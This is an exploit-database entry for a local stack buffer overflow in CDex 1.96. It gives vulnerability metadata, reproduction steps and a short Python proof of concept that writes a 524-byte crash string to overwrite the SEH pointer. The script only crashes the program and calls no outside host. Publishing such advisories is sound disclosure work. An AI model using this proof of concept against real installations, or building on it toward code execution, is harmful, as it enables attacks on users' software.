header-logo
Suggest Exploit
vendor:
CDex
by:
bzyo
7,8
CVSS
HIGH
Stack Buffer Overflow
119
CWE
Product Name: CDex
Affected Version From: v1.96
Affected Version To: v1.96
Patch Exists: YES
Related CWE: N/A
CPE: a:cdex:cdex:1.96
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 x32
2017

CDex 1.96 – Local Stack Buffer Overflow

CDex 1.96 (Unicode Build) is vulnerable to a local stack buffer overflow. An attacker can exploit this vulnerability by generating a crash.txt file, opening the application, going to options, settings, encoding, tags, and pasting the crash.txt contents in the picture text. This will cause the application to crash, resulting in a pointer to the next SEH record and no unicode ppr pointers.

Mitigation:

Update to the latest version of CDex 1.96 (Unicode Build)
Source

Exploit-DB raw data:

#!/usr/bin/python
 
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: CDex 1.96  - Local Stack Buffer Overflow
# Date: 17-12-2017
# Vulnerable Software: CDex 1.96 (Unicode Build)
# Vendor Homepage: http://cdex.mu/
# Version: v1.96
# Software Link: http://cdex.mu/?q=download
# Tested On: Windows 7 x32
#
#
# PoC: generate crash.txt, open app, go to options, settings, encoding, tags, paste crash.txt contents in picture text
#
# app crashes; 00420042 Pointer to next SEH record; no unicode ppr pointers
#


file="crash.txt"

crash = "A"*520 + "B"*4  		#seh
 
writeFile = open (file, "w")
writeFile.write( crash )
writeFile.close()

Navigation

Suggest Exploit

Services By CQR